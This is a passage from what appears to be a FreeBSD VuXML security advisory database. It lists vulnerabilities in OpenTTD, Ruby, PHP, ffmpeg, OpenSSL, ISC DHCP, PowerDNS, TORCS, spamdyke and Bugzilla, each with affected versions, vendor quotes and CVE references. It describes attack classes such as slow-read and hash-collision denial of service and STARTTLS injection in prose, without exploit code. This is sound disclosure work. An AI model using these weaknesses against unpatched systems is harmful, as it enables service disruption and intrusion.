numbers of parameters and parameter values.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0022</cvename>
<url>http://tomcat.apache.org/security-5.html#Fixed_in_Apache_Tomcat_5.5.35</url>
<url>http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.34</url>
<url>http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.23</url>
</references>
<dates>
<discovery>2011-10-21</discovery>
<entry>2012-01-17</entry>
</dates>
</vuln>
<vuln vid="1ac858b0-3fae-11e1-a127-0013d3ccd9df">
<topic>OpenTTD -- Denial of service (server) via slow read attack</topic>
<affects>
<package>
<name>openttd</name>
<range><ge>0.3.5</ge><lt>1.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenTTD Team reports:</p>
<blockquote cite="http://security.openttd.org/en/CVE-2012-0049">
<p>Using a slow read type attack it is possible to prevent anyone
from joining a server with virtually no resources. Once
downloading the map no other downloads of the map can start, so
downloading really slowly will prevent others from joining.
This can be further aggravated by the pause-on-join setting in
which case the game is paused and the players cannot continue
the game during such an attack. This attack requires that the
user is not banned and passes the authorization to the server,
although for many servers there is no server password and thus
authorization is easy.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0049</cvename>
<url>http://security.openttd.org/en/CVE-2012-0049</url>
</references>
<dates>
<discovery>2012-01-06</discovery>
<entry>2012-01-16</entry>
</dates>
</vuln>
<vuln vid="91be81e7-3fea-11e1-afc7-2c4138874f7d">
<topic>Multiple implementations -- DoS via hash algorithm collision</topic>
<affects>
<package>
<name>jruby</name>
<range><lt>1.6.5.1</lt></range>
</package>
<package>
<name>ruby</name>
<name>ruby+nopthreads</name>
<name>ruby+nopthreads+oniguruma</name>
<name>ruby+oniguruma</name>
<range><lt>1.8.7.357,1</lt></range>
</package>
<package>
<name>rubygem-rack</name>
<range><lt>1.3.6,3</lt></range>
</package>
<package>
<name>v8</name>
<range><lt>3.8.5</lt></range>
</package>
<package>
<name>redis</name>
<range><le>2.4.6</le></range>
</package>
<package>
<name>node</name>
<range><lt>0.6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>oCERT reports:</p>
<blockquote cite="http://www.ocert.org/advisories/ocert-2011-003.html">
<p>A variety of programming languages suffer from a denial-of-service
(DoS) condition against storage functions of key/value pairs in
hash data structures; the condition can be leveraged by exploiting
predictable collisions in the underlying hashing algorithms.</p>
<p>The issue finds particular exposure in web server applications
and/or frameworks. In particular, the lack of sufficient limits
for the number of parameters in POST requests in conjunction with
the predictable collision properties in the hashing functions of
the underlying languages can render web applications vulnerable
to the DoS condition. The attacker, using specially crafted HTTP
requests, can lead to 100% CPU usage which can last up to
several hours depending on the targeted application and server
performance; the amplification effect is considerable and
requires little bandwidth and time on the attacker side.</p>
<p>The condition for predictable collisions in the hashing functions
has been reported for the following language implementations:
Java, JRuby, PHP, Python, Rubinius, Ruby. In the case of the
Ruby language, the 1.9.x branch is not affected by the
predictable collision condition since this version includes a
randomization of the hashing function.</p>
<p>The vulnerability outlined in this advisory is practically
identical to the one reported in 2003 and described in the paper
Denial of Service via Algorithmic Complexity Attacks which
affected the Perl language.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4838</cvename>
<cvename>CVE-2011-4815</cvename>
<cvename>CVE-2011-5036</cvename>
<cvename>CVE-2011-5037</cvename>
<url>http://www.ocert.org/advisories/ocert-2011-003.html</url>
<url>http://www.nruns.com/_downloads/advisory28122011.pdf</url>
</references>
<dates>
<discovery>2011-12-28</discovery>
<entry>2012-01-16</entry>
<modified>2012-01-20</modified>
</dates>
</vuln>
<vuln vid="ea2ddc49-3e8e-11e1-8095-5404a67eef98">
<topic>ffmpeg -- multiple vulnerabilities</topic>
<affects>
<package>
<name>ffmpeg</name>
<range><lt>0.7.11,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ubuntu Security Notice USN-1320-1 reports:</p>
<blockquote cite="http://www.ubuntu.com/usn/usn-1320-1">
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed QDM2 streams. If a user were tricked into opening
a crafted QDM2 stream file, an attacker could cause a denial of
service via application crash, or possibly execute arbitrary code
with the privileges of the user invoking the program.
(CVE-2011-4351)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed VP3 streams. If a user were tricked into opening
a crafted file, an attacker could cause a denial of service via
application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4352)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed VP5 and VP6 streams. If a user were tricked into
opening a crafted file, an attacker could cause a denial of service
via application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4353)</p>
<p>It was discovered that FFmpeg incorrectly handled certain
malformed VMD files. If a user were tricked into opening a crafted
VMD file, an attacker could cause a denial of service via
application crash, or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2011-4364)</p>
<p>Phillip Langlois discovered that FFmpeg incorrectly handled
certain malformed SVQ1 streams. If a user were tricked into opening
a crafted SVQ1 stream file, an attacker could cause a denial of
service via application crash, or possibly execute arbitrary code
with the privileges of the user invoking the program.
(CVE-2011-4579)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4351</cvename>
<cvename>CVE-2011-4352</cvename>
<cvename>CVE-2011-4353</cvename>
<cvename>CVE-2011-4364</cvename>
<cvename>CVE-2011-4579</cvename>
<url>http://www.ubuntu.com/usn/usn-1320-1</url>
</references>
<dates>
<discovery>2011-09-14</discovery>
<entry>2012-01-14</entry>
</dates>
</vuln>
<vuln vid="78cc8a46-3e56-11e1-89b4-001ec9578670">
<topic>OpenSSL -- multiple vulnerabilities</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://openssl.org/news/secadv_20120104.txt">
<p>6 security flaws have been fixed in OpenSSL 1.0.0f:</p>
<p>If X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8,
then a policy check failure can lead to a double-free.</p>
<p>OpenSSL prior to 1.0.0f and 0.9.8s failed to clear the
bytes used as block cipher padding in SSL 3.0 records.
As a result, in each record, up to 15 bytes of
uninitialized memory may be sent, encrypted, to the SSL
peer. This could include sensitive contents of
previously freed memory.</p>
<p>RFC 3779 data can be included in certificates, and if
it is malformed, may trigger an assertion failure.
This could be used in a denial-of-service attack.</p>
<p>Support for handshake restarts for server gated
cryptography (SGC) can be used in a denial-of-service
attack.</p>
<p>A malicious TLS client can send an invalid set of GOST
parameters which will cause the server to crash due to
lack of error checking. This could be used in a
denial-of-service attack.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4108</cvename>
<cvename>CVE-2011-4109</cvename>
<cvename>CVE-2011-4576</cvename>
<cvename>CVE-2011-4577</cvename>
<cvename>CVE-2011-4619</cvename>
<cvename>CVE-2012-0027</cvename>
<url>http://openssl.org/news/secadv_20120104.txt</url>
</references>
<dates>
<discovery>2012-01-04</discovery>
<entry>2012-01-14</entry>
</dates>
</vuln>
<vuln vid="1800886c-3dde-11e1-89b4-001ec9578670">
<topic>isc-dhcp-server -- DoS in DHCPv6</topic>
<affects>
<package>
<name>isc-dhcp42-server</name>
<range><lt>4.2.3_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://www.isc.org/software/dhcp/advisories/cve-2011-4868">
<p>Due to improper handling of a DHCPv6 lease structure, ISC DHCP
servers that are serving IPv6 address pools AND using Dynamic
DNS can encounter a segmentation fault error while updating lease
status under certain conditions.</p>
<p>The potential exists for this condition to be intentionally
triggered, resulting in effective denial of service to
clients expecting service from the affected server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4868</cvename>
<url>https://www.isc.org/software/dhcp/advisories/cve-2011-4868</url>
</references>
<dates>
<discovery>2012-01-13</discovery>
<entry>2012-01-13</entry>
</dates>
</vuln>
<vuln vid="3338f87c-3d5f-11e1-a00a-000c6eb41cf7">
<topic>PowerDNS -- Denial of Service Vulnerability</topic>
<affects>
<package>
<name>powerdns</name>
<name>powerdns-devel</name>
<range><lt>3.0.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PowerDNS Team reports:</p>
<blockquote cite="http://www.powerdns.com/news/powerdns-security-advisory-2012-01.html">
<p>Using well crafted UDP packets, one or more PowerDNS servers
could be made to enter a tight packet loop, causing temporary
denial of service.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0206</cvename>
</references>
<dates>
<discovery>2012-01-10</discovery>
<entry>2012-01-12</entry>
</dates>
</vuln>
<vuln vid="d3921810-3c80-11e1-97e8-00215c6a37bb">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php5</name>
<name>php5-exif</name>
<range><lt>5.3.9</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_5</lt></range>
</package>
<package>
<name>php52-exif</name>
<range><lt>5.2.17_6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-01-11-1">
<p>Security Enhancements and Fixes in PHP 5.3.9:</p>
<ul>
<li>Added max_input_vars directive to prevent attacks
based on hash collisions. (CVE-2011-4885)</li>
<li>Fixed bug #60150 (Integer overflow during the parsing
of invalid exif header). (CVE-2011-4566)</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4566</cvename>
<cvename>CVE-2011-4885</cvename>
<url>http://www.nruns.com/_downloads/advisory28122011.pdf</url>
</references>
<dates>
<discovery>2011-12-29</discovery>
<entry>2012-01-11</entry>
<modified>2012-01-19</modified>
</dates>
</vuln>
<vuln vid="e7fd27b2-3ae9-11e1-8b5c-00262d5ed8ee">
<topic>torcs -- untrusted local library loading</topic>
<affects>
<package>
<name>torcs</name>
<range><lt>1.3.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>TORCS News reports:</p>
<blockquote cite="http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=77">
<p>An insecure change to LD_LIBRARY_PATH allows loading of libraries
in directories other than the standard paths. This can be a
problem when downloading and installing untrusted content from the
Internet.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2010-3384</cvename>
<url>http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=77</url>
<url>http://sourceforge.net/tracker/index.php?func=detail&amp;aid=3089384&amp;group_id=3777&amp;atid=103777</url>
</references>
<dates>
<discovery>2010-10-20</discovery>
<entry>2012-01-09</entry>
</dates>
</vuln>
<vuln vid="a47af810-3a17-11e1-a1be-00e0815b8da8">
<topic>spamdyke -- STARTTLS Plaintext Injection Vulnerability</topic>
<affects>
<package>
<name>spamdyke</name>
<range><lt>4.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47435/">
<p>The vulnerability is caused due to the TLS implementation not
properly clearing transport layer buffers when upgrading from
plaintext to ciphertext after receiving the "STARTTLS" command.
This can be exploited to insert arbitrary plaintext data (e.g.
SMTP commands) during the plaintext phase, which will then be
executed after upgrading to the TLS ciphertext phase.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0070</cvename>
<url>http://secunia.com/advisories/47435/</url>
<url>http://www.spamdyke.org/documentation/Changelog.txt</url>
</references>
<dates>
<discovery>2012-01-04</discovery>
<entry>2012-01-08</entry>
<modified>2012-01-23</modified>
</dates>
</vuln>
<vuln vid="0c7a3ee2-3654-11e1-b404-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>2.4.*</ge><lt>3.6.7</lt></range>
<range><ge>4.0.*</ge><lt>4.0.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.4.12/">
<p>The following security issues have been discovered in Bugzilla:</p>
<ul>
<li>Tabular and graphical reports, as well as new charts have
a debug mode which displays raw data as plain text. This
text is not correctly escaped and a crafted URL could use
this vulnerability to inject code leading to XSS.</li>
<li>The User.offer_account_by_email WebService method ignores
the user_can_create_account setting of the authentication
method and generates an email with a token in it which the
user can use to create an account. Depending on the
authentication method being active, this could allow the
user to log in using this account.
Installations where the createemailregexp parameter is
empty are not vulnerable to this issue.</li>
<li>The creation of bug reports and of attachments is not
protected by a token and so they can be created without the
consent of a user if the relevant code is embedded in an
HTML page and the user visits this page. This behavior was
intentional to let third-party applications submit new bug
reports and attachments easily. But as this behavior can be
abused by a malicious user, it has been decided to block
submissions with no valid token starting from version 4.2rc1.
Older branches are not patched to not break these third-party
applications after the upgrade.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3657</cvename>
<cvename>CVE-2011-3667</cvename>
<cvename>CVE-2011-3668</cvename>
<cvename>CVE-2011-3669</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=697699</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=711714</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=703975</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=703983</url>
</references>
<dates>
<discovery>2011-11-28</discovery>
<entry>2012-01-05</entry>
</dates>
</vuln>